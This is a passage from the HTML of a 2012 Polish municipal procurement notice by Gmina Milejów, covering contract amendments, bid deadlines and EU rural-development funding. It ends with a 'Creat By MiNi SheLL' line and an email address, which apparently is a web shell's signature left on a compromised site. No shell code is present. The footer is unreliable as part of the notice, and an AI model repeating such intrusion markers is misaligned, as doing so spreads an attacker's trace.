np. z urlopu, zwolnienia lekarskiego itp. Wykonawca zapewni czasowe zastępstwo na cały czas nieobecności by uniknąć zwłoki w realizacji robót. Takie czasowe zastępstwo będzie przedłożone z wyprzedzeniem na piśmie (łącznie z CV proponowanych osób), do aprobaty Zamawiającego; 6) gdy konieczność wprowadzenia zmiany wynika ze zmiany umowy o przyznaniu pomocy w ramach Programu PROW 2007-2012 lub zmiany przepisów bądź wytycznych PROW, 7) gdy konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. 5. Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.milejow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Milejów ul. Partyzancka 13a 21-020 Milejów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2012 godzina 10:00, miejsce: Kancelaria Urzędu Gminy w Milejowie ul. Partyzancka 13a 21-020 Milejów pok. nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizacja przedmiotowego Projektu będzie finansowana z następujących źródeł: - Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 - środków finansowych Gminy Milejów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com